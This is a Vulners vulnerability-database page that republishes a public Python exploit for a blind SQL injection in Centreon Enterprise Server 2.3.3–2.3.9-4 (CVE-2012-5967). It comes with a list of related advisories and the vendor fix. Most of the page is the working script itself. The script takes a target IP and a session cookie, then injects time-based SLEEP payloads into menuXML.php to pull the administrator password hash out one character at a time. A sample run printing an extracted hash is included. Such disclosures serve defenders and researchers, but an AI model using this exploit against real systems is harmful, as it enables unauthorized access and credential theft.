Vulners
Lucene search
Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Centreon 2.3.3 < 2.4.0 menuXML.php 'menu' Parameter SQL Injection | 23 Dec 201400:00 | – | nessus |
 | CVE-2012-5967 | 19 Dec 201211:00 | – | cve |
 | CVE-2012-5967 | 19 Dec 201211:00 | – | cvelist |
 | Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection | 13 Dec 201200:00 | – | exploitdb |
 | EUVD-2012-5841 | 7 Oct 202500:30 | – | euvd |
 | Centreon Enterprise Server 2.3.3 2.3.9-4 - Blind SQL Injection | 13 Dec 201200:00 | – | exploitpack |
 | CVE-2012-5967 | 19 Dec 201211:55 | – | nvd |
 | Centreon 2.3.x SQL Injection | 13 Dec 201200:00 | – | packetstorm |
 | Sql injection | 19 Dec 201211:55 | – | prion |
 | Centreon 2.3.3 through 2.3.9-4 blind sqli injection vulnerability. | 12 Dec 201200:00 | – | cert |
10
#!/usr/bin/env python
# Exploit Title: Centreon 2.3.3 - 2.3.9-4 menuXML.php Blind SQL Injection Exploit
# Disclosure Date: December 12, 2012
# Author: modpr0be (@modpr0be)
# Platform: Linux
# Tested on: Centreon Enterprise Server with Centreon 2.3.9-4 on CentOS 5.5 x86_64 (Final)
# Software Link: http://www.centreon.com/Content-Download/download-centreon-enterprise-server
# References: http://www.spentera.com/2012/12/centreon-enterprise-server-blind-sql-injection/
# CVE-ID: CVE-2012-5967
### DISCLAIMER
# Script provided 'as is', without any warranty.
# For educational purposes only.
# Do not use this code to do anything illegal.
### Software Description
# The Centreon Software Suite is a set of modular software programs designed for managing
# and controlling your information systems. It lets you supervise and measure performance and
# quality of service so that you can optimise the use of your resources.
### Vulnerability Details
# Vulnerability found in menuXML.php inside the 'menu' parameter. By injecting payload after the
# menu parameter, e.g: ' AND SLEEP(5) AND 'meHL'='meHL, the web application hung for 5 seconds,
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.
## Further notes:
# User with low privilege access (e.g: guest user) can still exploit this vulnerability
# The script below is for PoC of the vulnerability only.
# -=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-
# [ by modpr0be - research[at]spentera.com ]
#
# (!) We need the target IP: 172.16.199.150
# (!) Put the value of a valid PHPSESSID session: 3uh52mtl1hlmsha4nmkftde5l3
# (-) Using Time-Based method with 1s delay. This will take some time, go grab a coffee..
# (!) Getting admin password hash: 2995cb0650c5f107230ed569a8c4d6e5
# (-) Done! Admin password hash extracted in 676 seconds
### Solution
# Update to Centreon 2.4.0 or newer.
### Disclosure timeline
# 10/26/2012 - Bug found and reported to CERT/CC
# 12/07/2012 - Update from CERT/CC to publish on 12/12/2012
# 12/12/2012 - Security advisory released via CERT/CC
import sys,time,urllib,urllib2
print """
-=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-
[ by modpr0be - research[at]spentera.com ]
"""
host = raw_input("(!) We need the target IP: ")
target = 'http://%s/centreon/menu/xml/menuXML.php' %(host)
# sid is the same as PHPSESSID session value, so put the value of PHPSESSID here
sid = raw_input("(!) Put the value of a valid PHPSESSID session: ")
cookie = 'PHPSESSID=%s' %(sid)
# SQLi delay, tested on LAN environment.
# Consider if it's a remote target, you may increase the delay value (default: 1 seconds)
delay=1
print "(-) Using Time-Based method with %ds delay. This will take some time, go grab a coffee..\n"%int(delay)
def Hex2Des(item):
return ord(hex(item).replace('0x',''))
def adminhash(m,n):
#borrow from SQLmap :)
adminquery=("' AND 9999=IF((ORD(MID((SELECT IFNULL(CAST(contact_passwd AS CHAR),0x20) FROM contact"
" WHERE contact_id=1 LIMIT 0,1),%s,1)) > %s),SLEEP(%s),9999) AND 'mEhL'='mEhL" %(m,n,delay))
value = { 'menu': '2'+adminquery,
'sid': '%s'%(sid) }
url = "%s?%s" %(target,urllib.urlencode(value))
req = urllib2.Request(url)
req.add_header('Cookie', cookie)
try:
starttime=time.time()
response = urllib2.urlopen(req)
endtime = time.time()
return int(endtime-starttime)
except:
print '\n(-) Uh oh! Exploit fail..'
sys.exit(0)
sys.stdout.write('(!) Getting admin password hash: ')
sys.stdout.flush()
starttime = time.time()
for m in range(1,33):
for n in range(0,16):
wkttunggu = adminhash(m,Hex2Des(n))
if (wkttunggu < delay):
sys.stdout.write(chr(Hex2Des(n)))
sys.stdout.flush()
break
endtime = time.time()
print "\n(-) Done! Admin password hash extracted in %d seconds" %int(endtime-starttime)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00218